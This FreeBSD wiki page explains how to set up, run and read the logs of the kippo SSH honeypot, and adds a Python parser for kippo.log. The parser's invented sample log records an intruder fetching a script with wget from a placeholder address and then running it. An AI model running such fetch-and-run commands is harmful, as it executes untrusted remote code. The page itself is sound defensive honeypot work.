kippo

From: FreeBSD入門

kippo is an interactive SSH honeypot: it accepts logins, presents a fake shell, and records everything the intruder types.

Pronunciation

kippo
kippo (きっぽ)

Overview

kippo is an SSH honeypot. The kippo installed from pkg behaves suspiciously, so downloading it from GitHub (github.com/desaster/kippo) looks like the better option. Installing with pkg pulls in the dependencies (Twisted and the rest of the list in the install log below) in one go, so the practical route is to install the package first and then fetch the latest source with git on top of it. Note that upstream kippo is no longer developed; Cowrie is the maintained fork.

Files the intruder fetches with wget inside the fake shell are stored in the dl directory, so kippo can be used to collect malware samples and other payloads. Treat that directory as containing live malware: never execute its contents on the honeypot host or anywhere outside an analysis sandbox.

Installation

$ sudo pkg install kippo

Installation example

$ sudo pkg install kippo
Updating FreeBSD repository catalogue...
Fetching meta.txz: 100%    944 B   0.9kB/s    00:01
Fetching packagesite.txz: 100%    5 MiB 330.3kB/s    00:16
Processing entries: 100%
FreeBSD repository update completed. 23798 packages processed.
The following 8 package(s) will be affected (of 0 checked):
 
New packages to be INSTALLED:
        kippo: 0.8
        py27-twistedWeb: 15.2.1
        py27-twistedCore: 15.2.1
        py27-service_identity: 14.0.0
        py27-characteristic: 14.1.0
        py27-asn1-modules: 0.0.6
        py27-zope.interface: 4.1.2
        py27-twistedConch: 15.2.1
 
The process will require 34 MiB more space.
4 MiB to be downloaded.
 
Proceed with this action? [y/N]: y
Fetching kippo-0.8.txz: 100%  383 KiB 196.1kB/s    00:02
Fetching py27-twistedWeb-15.2.1.txz: 100%  457 KiB 234.1kB/s    00:02
Fetching py27-twistedCore-15.2.1.txz: 100%    2 MiB 247.8kB/s    00:09
Fetching py27-service_identity-14.0.0.txz: 100%   12 KiB  12.3kB/s    00:01
Fetching py27-characteristic-14.1.0.txz: 100%   19 KiB  19.8kB/s    00:01
Fetching py27-asn1-modules-0.0.6.txz: 100%   49 KiB  50.5kB/s    00:01
Fetching py27-zope.interface-4.1.2.txz: 100%  171 KiB 175.0kB/s    00:01
Fetching py27-twistedConch-15.2.1.txz: 100%  453 KiB 154.6kB/s    00:03
Checking integrity... done (0 conflicting)
[1/8] Installing py27-characteristic-14.1.0...
[1/8] Extracting py27-characteristic-14.1.0: 100%
[2/8] Installing py27-asn1-modules-0.0.6...
[2/8] Extracting py27-asn1-modules-0.0.6: 100%
[3/8] Installing py27-service_identity-14.0.0...
[3/8] Extracting py27-service_identity-14.0.0: 100%
[4/8] Installing py27-zope.interface-4.1.2...
[4/8] Extracting py27-zope.interface-4.1.2: 100%
[5/8] Installing py27-twistedCore-15.2.1...
[5/8] Extracting py27-twistedCore-15.2.1: 100%
[6/8] Installing py27-twistedWeb-15.2.1...
[6/8] Extracting py27-twistedWeb-15.2.1: 100%
[7/8] Installing py27-twistedConch-15.2.1...
[7/8] Extracting py27-twistedConch-15.2.1: 100%
[8/8] Installing kippo-0.8...
===> Creating users and/or groups.
Creating group 'kippo' with gid '969'.
Creating user 'kippo' with uid '969'.
[8/8] Extracting kippo-0.8: 100%
Message for kippo-0.8:
kippo has been installed in the following directory:
 
        /usr/local/share/kippo
 
Before starting kippo you need to perform the following steps:
 
1) Edit kippo's configuration file to suit your needs:
 
        $EDITOR /usr/local/share/kippo/kippo.cfg
 
   Please keep in mind when editing the configuration file that kippo
   can't be run as root and is started by the 'kippo' unprivileged
   user instead. This implies that the following folders hierarchy
   must be created and made writable to the 'kippo' user:
 
        dl/
        data/
        log/tty/
 
2) Add the following line to your rc.conf:
 
        kippo_enable="YES"
 
   Note that you can also set the 'kippo_logfile' and 'kippo_pidfile'
   variables to specify the path to the log file and pid file that
   will be used by kippo. The default values for those variables are
   '/tmp/kippo.log' and '/tmp/kippo.pid' respectively.
 
Then you can start kippo by issuing the following command:
 
        service kippo start

Configuration

As the pkg message says, kippo refuses to run as root: the rc script starts it as the unprivileged kippo user, so the host key and the writable directories must exist and belong to that user before the first start. Generate a host key under the private.key / public.key names that kippo.cfg refers to, then create dl, data and log/tty. The empty passphrase (-N '') is deliberate: kippo loads the key unattended, and this is a decoy host key that protects nothing real. ssh-keygen creates the private key with mode 0600, so after the chown only the kippo user can read it.

sudo /usr/bin/ssh-keygen -t rsa -f /usr/local/share/kippo/private.key -N ''
sudo mv /usr/local/share/kippo/private.key.pub /usr/local/share/kippo/public.key
sudo chown kippo:kippo /usr/local/share/kippo/*.key
cd /usr/local/share/kippo
sudo mkdir dl data log
sudo chown kippo:kippo dl data log
sudo -u kippo mkdir log/tty

Afterwards check with ls -l that the key files and the three directories are owned by kippo and that private.key is neither group- nor world-readable.

Starting and stopping

Enable the service in /etc/rc.conf with kippo_enable="YES", as the pkg message says. Unless kippo_logfile and kippo_pidfile are also set there, the rc script writes to /tmp/kippo.log and /tmp/kippo.pid. /tmp is world-writable and the log is the evidence of what intruders did, so for anything beyond a quick test point kippo_logfile at a directory owned by the kippo user, for example /usr/local/share/kippo/log/kippo.log.

Start kippo as follows.

sudo service kippo start

Stop it as follows.

sudo service kippo stop

After starting, confirm with ps(1) that the kippo process runs as the kippo user rather than root, and with sockstat(1) that it is listening on port 2222.

Directory layout

dl
Files the intruder downloads with wget are saved here. Treat them as live malware and analyse them only in a sandbox.
log/kippo.log
kippo's log file when started with upstream's start.sh. With the FreeBSD rc script the log goes to /tmp/kippo.log unless kippo_logfile is set, as described above.
log/tty/
Per-session terminal recordings, one file per login (the log below shows log/tty/20150709-021415-8938.log being opened). They can be replayed with the playlog.py utility shipped with kippo.
honeyfs
The files that make up the fake filesystem the intruder sees.
txtcmds
Static text returned for commands such as ifconfig (txtcmds/sbin/ifconfig, which the log below shows being read).

Default port

The default port is 2222 (ssh_port in kippo.cfg). Because kippo runs as an unprivileged user it cannot bind port 22 itself, and most scanners only try 22, so on a real deployment redirect incoming port 22 to 2222 with the packet filter, or move the real sshd elsewhere first.

Usage

Try logging in

Connect to port 2222 as root. The stock kippo user database accepts root with the password 123456, which is the credential the log below records as succeeded. Everything after the Password: prompt, from the hostname nas3 onward, is kippo's fake system.

$ ssh -l root localhost -p 2222
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is SHA256:ZZZZZZZZZZZZZZZZZZZZ.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
Password:
nas3:~#
nas3:~# ps -a
 PID TTY      STAT    TIME COMMAND
   1 ?        Ss      0:07 init [2]
   2 ?        S<      0:00 [kthreadd]
   3 ?        S<      0:00 [migration/0]
   4 ?        S<      0:00 [ksoftirqd/0]
   5 ?        S<      0:00 [watchdog/0]
   6 ?        S<      0:17 [events/0]
   7 ?        S<      0:00 [khelper]
  39 ?        S<      0:00 [kblockd/0]
  41 ?        S<      0:00 [kacpid]
  42 ?        S<      0:00 [kacpi_notify]
 170 ?        S<      0:00 [kseriod]
 207 ?        S       0:01 [pdflush]
 208 ?        S       0:00 [pdflush]
 209 ?        S<      0:00 [kswapd0]
 210 ?        S<      0:00 [aio/0]
 748 ?        S<      0:00 [ata/0]
 749 ?        S<      0:00 [ata_aux]
 929 ?        S<      0:00 [scsi_eh_0]
1014 ?        D<      0:03 [kjournald]
1087 ?        S<s     0:00 udevd --daemon
1553 ?        S<      0:00 [kpsmoused]
2054 ?        Sl      0:01 /usr/sbin/rsyslogd -c3
2103 tty1     Ss      0:00 /bin/login --
2105 tty2     Ss+     0:00 /sbin/getty 38400 tty2
2107 tty3     Ss+     0:00 /sbin/getty 38400 tty3
2109 tty4     Ss+     0:00 /sbin/getty 38400 tty4
2110 tty5     Ss+     0:00 /sbin/getty 38400 tty5
2112 tty6     Ss+     0:00 /sbin/getty 38400 tty6
2133 ?        S<s     0:00 dhclient3 -pf /var/run/dhclient.eth0.pid -lf /var/lib
4969 ?        Ss      0:00 /usr/sbin/sshd: root@pts/0
5673 pts/0    Ss      0:00 -bash
5679 pts/0    R+      0:00 ps -a
nas3:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)
 
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)

Note that the ps and ifconfig output above is canned: the log below shows ifconfig being read from the static file /usr/local/share/kippo/txtcmds/sbin/ifconfig, and ps is emulated by kippo with a fixed process list. An intruder who runs the same command twice, or compares the MAC and IP address shown with the address they actually connected to, has a cheap way to spot the honeypot, so edit those files to match the host you are pretending to be.

Logs

$ tail -f /tmp/kippo.log
2015-07-09 02:14:08+0900 [-] New connection: 127.0.0.1:41836 (127.0.0.1:2222) [session: 0]
2015-07-09 02:14:08+0900 [-] Remote SSH version: SSH-2.0-OpenSSH_6.8-hpn14v5
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] outgoing: aes128-ctr hmac-sha1 none
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] incoming: aes128-ctr hmac-sha1 none
2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] NEW KEYS
2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] starting service ssh-userauth
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth none
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth keyboard-interactive
2015-07-09 02:14:15+0900 [-] login attempt [root/123456] succeeded
2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root authenticated with keyboard-interactive
2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] starting service ssh-connection
2015-07-09 02:14:15+0900 [SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] got channel session request
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] channel open
2015-07-09 02:14:15+0900 [SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] got global no-more-sessions@openssh.com request
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] pty request: xterm-256color (71, 80, 0, 0)
2015-07-09 02:14:15+0900 [-] Terminal size: 71 80
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] getting shell
2015-07-09 02:14:15+0900 [-] Opening TTY log: log/tty/20150709-021415-8938.log
2015-07-09 02:14:17+0900 [-] /etc/motd resolved into /etc/motd
2015-07-09 02:15:34+0900 [-] CMD: ls
2015-07-09 02:15:34+0900 [-] Command found: ls
2015-07-09 02:15:38+0900 [-] CMD: ls /bin
2015-07-09 02:15:38+0900 [-] Command found: ls /bin
2015-07-09 02:15:47+0900 [-] CMD: ps
2015-07-09 02:15:47+0900 [-] Command found: ps
2015-07-09 02:15:50+0900 [-] CMD: ps -a
2015-07-09 02:15:50+0900 [-] Command found: ps -a
2015-07-09 02:15:59+0900 [-] CMD: ifconfig
2015-07-09 02:15:59+0900 [-] Command found: ifconfig
2015-07-09 02:15:59+0900 [-] Reading txtcmd from "/usr/local/share/kippo/txtcmds/sbin/ifconfig"

What to read off this record: Remote SSH version is the attacker's client banner (a cheap fingerprint of the tool; here it is FreeBSD's own OpenSSH because this was a local test), the login attempt lines give the credentials tried and whether they worked, CMD: lines are the commands typed, Command found and Reading txtcmd tell you whether kippo emulated the command or served canned text, and Opening TTY log names the session recording. Note also that the key exchange negotiated here is diffie-hellman-group1-sha1; OpenSSH clients from 7.0 onward disable that algorithm by default, so if the honeypot offers nothing stronger a current client will fail to connect unless started with -oKexAlgorithms=+diffie-hellman-group1-sha1 (ssh -vv shows what both sides offered).

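The following Python 3 script is an added example, not part of this page or of kippo itself (kippo runs on Python 2, but the script only reads the text log and stands alone). It parses lines in the kippo.log format shown above into one record per session (source address, client banner, credentials tried with outcome, commands typed, URLs passed to wget, commands kippo could not emulate) and summarises them per attacker address. The embedded log excerpt is constructed for the example: session 0 mirrors the test login above, while session 1 from 203.0.113.7 is invented to show failed guesses and a download. The file name kippo_summary.py in the usage comment is an assumption. One caveat is built into the parser: kippo's [-] lines do not name their session, so events are attributed to the most recent New connection line, which is wrong when two sessions interleave; on a busy honeypot use kippo's dblog output or the per-session tty files for attribution.

```python
# Added example for this page (Python 3), not code from kippo itself: it parses
# the plain kippo.log (twistd) text format shown above.
import re
from collections import Counter

# Constructed sample in kippo.log format. Session 0 mirrors the test login on
# this page; session 1 (203.0.113.7, a documentation address) is invented to
# show failed guesses, a wget download and a command kippo does not emulate.
SAMPLE_LOG = """\
2015-07-09 02:14:08+0900 [-] New connection: 127.0.0.1:41836 (127.0.0.1:2222) [session: 0]
2015-07-09 02:14:08+0900 [-] Remote SSH version: SSH-2.0-OpenSSH_6.8-hpn14v5
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth keyboard-interactive
2015-07-09 02:14:15+0900 [-] login attempt [root/123456] succeeded
2015-07-09 02:15:34+0900 [-] CMD: ls
2015-07-09 02:15:34+0900 [-] Command found: ls
2015-07-09 02:15:59+0900 [-] CMD: ifconfig
2015-07-09 03:02:11+0900 [-] New connection: 203.0.113.7:51022 (127.0.0.1:2222) [session: 1]
2015-07-09 03:02:11+0900 [-] Remote SSH version: SSH-2.0-libssh2_1.4.3
2015-07-09 03:02:12+0900 [-] login attempt [root/admin] failed
2015-07-09 03:02:14+0900 [-] login attempt [admin/admin] failed
2015-07-09 03:02:16+0900 [-] login attempt [root/123456] succeeded
2015-07-09 03:02:20+0900 [-] CMD: wget http://203.0.113.9/x.sh
2015-07-09 03:02:25+0900 [-] CMD: ./x.sh
2015-07-09 03:02:25+0900 [-] Command not found: ./x.sh
"""

# twistd line: "<timestamp> [<context>] <message>". The context is '-' or a
# Twisted object name containing spaces, so it is matched non-greedily.
LINE_RE = re.compile(r'^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4}) \[(.+?)\] (.*)$')
CONN_RE = re.compile(r'New connection: (\S+):(\d+) \(\S+:\d+\) \[session: (\d+)\]')
# Greedy password group anchored at the end: passwords may contain '/' or ']'.
AUTH_RE = re.compile(r'login attempt \[([^/]*)/(.*)\] (succeeded|failed)$')
URL_RE = re.compile(r'https?://\S+')
BANNER, CMD, NOTFOUND = 'Remote SSH version: ', 'CMD: ', 'Command not found: '


def parse_kippo_log(text):
    """One dict per 'New connection' line. Caveat: kippo's '[-]' lines carry
    no session id, so each event is charged to the most recent connection,
    which is wrong when sessions interleave (use dblog/tty files for those)."""
    sessions, current = [], None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # wrapped continuation or foreign line
        stamp, _context, msg = m.groups()
        c = CONN_RE.search(msg)
        if c:
            current = {'session': int(c.group(3)), 'src_ip': c.group(1),
                       'src_port': int(c.group(2)), 'start': stamp, 'client': None,
                       'logins': [], 'commands': [], 'not_found': [], 'urls': []}
            sessions.append(current)
            continue
        if current is None:
            continue  # log rotated mid-session; nothing to attach to
        a = AUTH_RE.search(msg)
        if msg.startswith(BANNER):
            current['client'] = msg[len(BANNER):]
        elif a:
            current['logins'].append((a.group(1), a.group(2), a.group(3) == 'succeeded'))
        elif msg.startswith(CMD):
            cmd = msg[len(CMD):]
            current['commands'].append(cmd)
            current['urls'].extend(URL_RE.findall(cmd))  # wget/curl targets
        elif msg.startswith(NOTFOUND):
            current['not_found'].append(msg[len(NOTFOUND):])
    return sessions


def credential_counts(sessions):
    """How often each user/password pair was tried, successful or not."""
    return Counter((u, p) for s in sessions for u, p, _ok in s['logins'])


def per_attacker(sessions):
    """Collapse sessions by source IP: banners seen, credentials that got in,
    commands typed and URLs fetched. This is the analyst's first view."""
    report = {}
    for s in sessions:
        r = report.setdefault(s['src_ip'], {'sessions': 0, 'clients': set(),
                              'successful_logins': set(), 'commands': [], 'urls': []})
        r['sessions'] += 1
        if s['client']:
            r['clients'].add(s['client'])
        r['successful_logins'].update((u, p) for u, p, ok in s['logins'] if ok)
        r['commands'].extend(s['commands'])
        r['urls'].extend(s['urls'])
    return report


if __name__ == '__main__':
    import sys
    # Usage: python3 kippo_summary.py /tmp/kippo.log (no argument: the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    sessions = parse_kippo_log(text)
    for ip, r in per_attacker(sessions).items():
        print('%s: %d session(s), clients %s' % (ip, r['sessions'], sorted(r['clients'])))
        print('  got in with %s; ran %s; fetched %s' %
              (sorted(r['successful_logins']), r['commands'], r['urls']))
    print('most tried credentials:', credential_counts(sessions).most_common(3))
```

Run it against the real file (python3 kippo_summary.py /tmp/kippo.log, or whatever kippo_logfile points at) to get, per source address, the client banners, the credentials that got in, the commands and the URLs fetched; credential_counts shows which user/password pairs the brute-forcers believe in. The URL list is the starting point for pulling samples from dl and for blocking the distribution hosts.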
See also



